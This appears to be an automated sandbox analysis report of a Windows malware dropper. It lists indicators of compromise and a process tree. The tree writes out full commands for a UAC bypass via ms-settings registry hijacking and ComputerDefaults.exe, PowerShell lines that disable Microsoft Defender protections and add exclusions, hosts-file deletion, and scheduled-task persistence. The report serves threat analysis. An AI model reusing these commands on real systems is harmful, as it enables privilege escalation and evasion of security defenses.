\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\3461.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\5680.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\5102.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings powershell.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe File created C:\IMG001.exe\:P:$DATA IMG001.exe File created C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 64 IoCs
pid Process 812 PING.EXE 10024 PING.EXE 11296 Process not Found 1692 PING.EXE 2316 PING.EXE 5732 PING.EXE 5096 PING.EXE 10600 Process not Found 2072 PING.EXE 724 PING.EXE 1324 PING.EXE 4356 PING.EXE 5656 PING.EXE 5496 PING.EXE 5528 PING.EXE 3824 PING.EXE 18224 Process not Found 13752 Process not Found 9348 Process not Found 5244 PING.EXE 5616 PING.EXE 11728 Process not Found 3688 PING.EXE 5744 PING.EXE 5252 PING.EXE 9392 Process not Found 336 Process not Found 2984 PING.EXE 17464 Process not Found 3064 PING.EXE 1988 PING.EXE 14576 PING.EXE 2648 PING.EXE 6788 PING.EXE 17780 PING.EXE 5768 PING.EXE 4352 PING.EXE 4948 PING.EXE 2828 PING.EXE 3816 PING.EXE 856 PING.EXE 10244 Process not Found 5540 PING.EXE 4072 PING.EXE 5284 PING.EXE 1812 PING.EXE 11552 Process not Found 576 PING.EXE 2672 PING.EXE 6712 PING.EXE 1412 PING.EXE 5648 PING.EXE 632 PING.EXE 2228 PING.EXE 8776 PING.EXE 12804 PING.EXE 5444 PING.EXE 6464 Process not Found 1816 PING.EXE 1688 PING.EXE 2060 PING.EXE 5440 PING.EXE 10516 PING.EXE 5076 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 15788 schtasks.exe 3156 schtasks.exe 2700 schtasks.exe 428 schtasks.exe 12224 schtasks.exe 7684 schtasks.exe 17156 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3744 powershell.exe 3744 powershell.exe 3616 powershell.exe 3616 powershell.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe 3376 filer.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3200 Explorer.EXE 4244 New Text Document mod.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5008 Gwogw.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4244 New Text Document mod.exe Token: SeDebugPrivilege 3376 filer.exe Token: SeDebugPrivilege 3744 powershell.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeIncreaseQuotaPrivilege 3188 wmic.exe Token: SeSecurityPrivilege 3188 wmic.exe Token: SeTakeOwnershipPrivilege 3188 wmic.exe Token: SeLoadDriverPrivilege 3188 wmic.exe Token: SeSystemProfilePrivilege 3188 wmic.exe Token: SeSystemtimePrivilege 3188 wmic.exe Token: SeProfSingleProcessPrivilege 3188 wmic.exe Token: SeIncBasePriorityPrivilege 3188 wmic.exe Token: SeCreatePagefilePrivilege 3188 wmic.exe Token: SeBackupPrivilege 3188 wmic.exe Token: SeRestorePrivilege 3188 wmic.exe Token: SeShutdownPrivilege 3188 wmic.exe Token: SeDebugPrivilege 3188 wmic.exe Token: SeSystemEnvironmentPrivilege 3188 wmic.exe Token: SeRemoteShutdownPrivilege 3188 wmic.exe Token: SeUndockPrivilege 3188 wmic.exe Token: SeManageVolumePrivilege 3188 wmic.exe Token: 33 3188 wmic.exe Token: 34 3188 wmic.exe Token: 35 3188 wmic.exe Token: 36 3188 wmic.exe Token: SeIncreaseQuotaPrivilege 3188 wmic.exe Token: SeSecurityPrivilege 3188 wmic.exe Token: SeTakeOwnershipPrivilege 3188 wmic.exe Token: SeLoadDriverPrivilege 3188 wmic.exe Token: SeSystemProfilePrivilege 3188 wmic.exe Token: SeSystemtimePrivilege 3188 wmic.exe Token: SeProfSingleProcessPrivilege 3188 wmic.exe Token: SeIncBasePriorityPrivilege 3188 wmic.exe Token: SeCreatePagefilePrivilege 3188 wmic.exe Token: SeBackupPrivilege 3188 wmic.exe Token: SeRestorePrivilege 3188 wmic.exe Token: SeShutdownPrivilege 3188 wmic.exe Token: SeDebugPrivilege 3188 wmic.exe Token: SeSystemEnvironmentPrivilege 3188 wmic.exe Token: SeRemoteShutdownPrivilege 3188 wmic.exe Token: SeUndockPrivilege 3188 wmic.exe Token: SeManageVolumePrivilege 3188 wmic.exe Token: 33 3188 wmic.exe Token: 34 3188 wmic.exe Token: 35 3188 wmic.exe Token: 36 3188 wmic.exe Token: SeIncreaseQuotaPrivilege 492 wmic.exe Token: SeSecurityPrivilege 492 wmic.exe Token: SeTakeOwnershipPrivilege 492 wmic.exe Token: SeLoadDriverPrivilege 492 wmic.exe Token: SeSystemProfilePrivilege 492 wmic.exe Token: SeSystemtimePrivilege 492 wmic.exe Token: SeProfSingleProcessPrivilege 492 wmic.exe Token: SeIncBasePriorityPrivilege 492 wmic.exe Token: SeCreatePagefilePrivilege 492 wmic.exe Token: SeBackupPrivilege 492 wmic.exe Token: SeRestorePrivilege 492 wmic.exe Token: SeShutdownPrivilege 492 wmic.exe Token: SeDebugPrivilege 492 wmic.exe Token: SeSystemEnvironmentPrivilege 492 wmic.exe Token: SeRemoteShutdownPrivilege 492 wmic.exe Token: SeUndockPrivilege 492 wmic.exe Token: SeManageVolumePrivilege 492 wmic.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
pid Process 4700 AmLzNi.exe 4700 AmLzNi.exe 4700 AmLzNi.exe 4952 Reynolds.com 4952 Reynolds.com 4952 Reynolds.com 2124 explorer.exe 4676 stories.tmp 9220 Cooper.pif 9220 Cooper.pif 9220 Cooper.pif 13420 rundll32.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 4700 AmLzNi.exe 4700 AmLzNi.exe 4700 AmLzNi.exe 4952 Reynolds.com 4952 Reynolds.com 4952 Reynolds.com 9220 Cooper.pif 9220 Cooper.pif 9220 Cooper.pif -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3376 filer.exe 972 9758xBqgE1azKnB.exe 5152 Conhost.exe 17668 Conhost.exe 13816 Conhost.exe 13524 Conhost.exe 7888 Conhost.exe 9272 Conhost.exe 6860 88851n80.exe 5284 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4244 wrote to memory of 792 4244 New Text Document mod.exe 78 PID 4244 wrote to memory of 792 4244 New Text Document mod.exe 78 PID 792 wrote to memory of 3096 792 fHR9z2C.exe 79 PID 792 wrote to memory of 3096 792 fHR9z2C.exe 79 PID 3096 wrote to memory of 3792 3096 cmd.exe 81 PID 3096 wrote to memory of 3792 3096 cmd.exe 81 PID 792 wrote to memory of 236 792 fHR9z2C.exe 82 PID 792 wrote to memory of 236 792 fHR9z2C.exe 82 PID 236 wrote to memory of 496 236 cmd.exe 84 PID 236 wrote to memory of 496 236 cmd.exe 84 PID 236 wrote to memory of 1056 236 cmd.exe 85 PID 236 wrote to memory of 1056 236 cmd.exe 85 PID 792 wrote to memory of 2036 792 fHR9z2C.exe 86 PID 792 wrote to memory of 2036 792 fHR9z2C.exe 86 PID 2036 wrote to memory of 4104 2036 cmd.exe 88 PID 2036 wrote to memory of 4104 2036 cmd.exe 88 PID 4104 wrote to memory of 576 4104 ComputerDefaults.exe 89 PID 4104 wrote to memory of 576 4104 ComputerDefaults.exe 89 PID 576 wrote to memory of 1592 576 wscript.exe 90 PID 576 wrote to memory of 1592 576 wscript.exe 90 PID 792 wrote to memory of 2112 792 fHR9z2C.exe 92 PID 792 wrote to memory of 2112 792 fHR9z2C.exe 92 PID 792 wrote to memory of 3772 792 fHR9z2C.exe 94 PID 792 wrote to memory of 3772 792 fHR9z2C.exe 94 PID 3772 wrote to memory of 1560 3772 cmd.exe 96 PID 3772 wrote to memory of 1560 3772 cmd.exe 96 PID 792 wrote to memory of 2700 792 fHR9z2C.exe 97 PID 792 wrote to memory of 2700 792 fHR9z2C.exe 97 PID 2700 wrote to memory of 3156 2700 cmd.exe 99 PID 2700 wrote to memory of 3156 2700 cmd.exe 99 PID 792 wrote to memory of 1448 792 fHR9z2C.exe 100 PID 792 wrote to memory of 1448 792 fHR9z2C.exe 100 PID 1448 wrote to memory of 1944 1448 cmd.exe 102 PID 1448 wrote to memory of 1944 1448 cmd.exe 102 PID 1448 wrote to memory of 3600 1448 cmd.exe 103 PID 1448 wrote to memory of 3600 1448 cmd.exe 103 PID 792 wrote to memory of 1540 792 fHR9z2C.exe 104 PID 792 wrote to memory of 1540 792 fHR9z2C.exe 104 PID 1540 wrote to memory of 4660 1540 cmd.exe 106 PID 1540 wrote to memory of 4660 1540 cmd.exe 106 PID 4660 wrote to memory of 4252 4660 ComputerDefaults.exe 107 PID 4660 wrote to memory of 4252 4660 ComputerDefaults.exe 107 PID 4252 wrote to memory of 3020 4252 wscript.exe 108 PID 4252 wrote to memory of 3020 4252 wscript.exe 108 PID 792 wrote to memory of 1052 792 fHR9z2C.exe 110 PID 792 wrote to memory of 1052 792 fHR9z2C.exe 110 PID 792 wrote to memory of 660 792 fHR9z2C.exe 112 PID 792 wrote to memory of 660 792 fHR9z2C.exe 112 PID 660 wrote to memory of 4752 660 cmd.exe 114 PID 660 wrote to memory of 4752 660 cmd.exe 114 PID 792 wrote to memory of 4172 792 fHR9z2C.exe 115 PID 792 wrote to memory of 4172 792 fHR9z2C.exe 115 PID 4172 wrote to memory of 2920 4172 cmd.exe 117 PID 4172 wrote to memory of 2920 4172 cmd.exe 117 PID 792 wrote to memory of 2076 792 fHR9z2C.exe 118 PID 792 wrote to memory of 2076 792 fHR9z2C.exe 118 PID 2076 wrote to memory of 4484 2076 cmd.exe 120 PID 2076 wrote to memory of 4484 2076 cmd.exe 120 PID 2076 wrote to memory of 4748 2076 cmd.exe 121 PID 2076 wrote to memory of 4748 2076 cmd.exe 121 PID 792 wrote to memory of 4632 792 fHR9z2C.exe 122 PID 792 wrote to memory of 4632 792 fHR9z2C.exe 122 PID 4632 wrote to memory of 3232 4632 cmd.exe 124 PID 4632 wrote to memory of 3232 4632 cmd.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:552
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\dlhost.exeC:\Users\Admin\AppData\Local\Temp\dlhost.exe2⤵PID:1816
-
-
C:\Users\Admin\AppData\Local\WahhVasyaa\88851n80.exeC:\Users\Admin\AppData\Local\WahhVasyaa\88851n80.exe2⤵PID:9856
-
-
C:\Users\Admin\AppData\Roaming\service.exeC:\Users\Admin\AppData\Roaming\service.exe2⤵PID:15556
-
-
C:\Users\Admin\AppData\Local\Temp\dlhost.exeC:\Users\Admin\AppData\Local\Temp\dlhost.exe2⤵PID:5236
-
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe2⤵PID:7312
-
-
C:\Users\Admin\AppData\Roaming\service.exeC:\Users\Admin\AppData\Roaming\service.exe2⤵PID:17252
-
-
C:\Users\Admin\AppData\Local\Temp\dlhost.exeC:\Users\Admin\AppData\Local\Temp\dlhost.exe2⤵PID:9976
-
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe2⤵PID:14464
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1340
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1428
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2556
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵PID:244
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵PID:2188
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2104
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2176
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2792
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2860
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3124
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3792
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5102.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5102.vbs" /f5⤵
- Modifies registry class
PID:496
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:1056
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\5102.vbs6⤵
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts7⤵PID:1592
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\5102.vbs4⤵PID:2112
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:1560
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3156
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3461.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3461.vbs" /f5⤵
- Modifies registry class
PID:1944
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3600
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\3461.vbs6⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3020
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\3461.vbs4⤵PID:1052
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4752
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2920
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5680.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5680.vbs" /f5⤵
- Modifies registry class
PID:4484
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4748
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:3232
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\5680.vbs6⤵PID:2828
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2832
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\5680.vbs4⤵PID:4888
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4712
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:3812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\filer.exe"C:\Users\Admin\AppData\Local\Temp\a\filer.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name4⤵
- Suspicious use of AdjustPrivilegeToken
PID:492
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:440
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4008
-
-
-
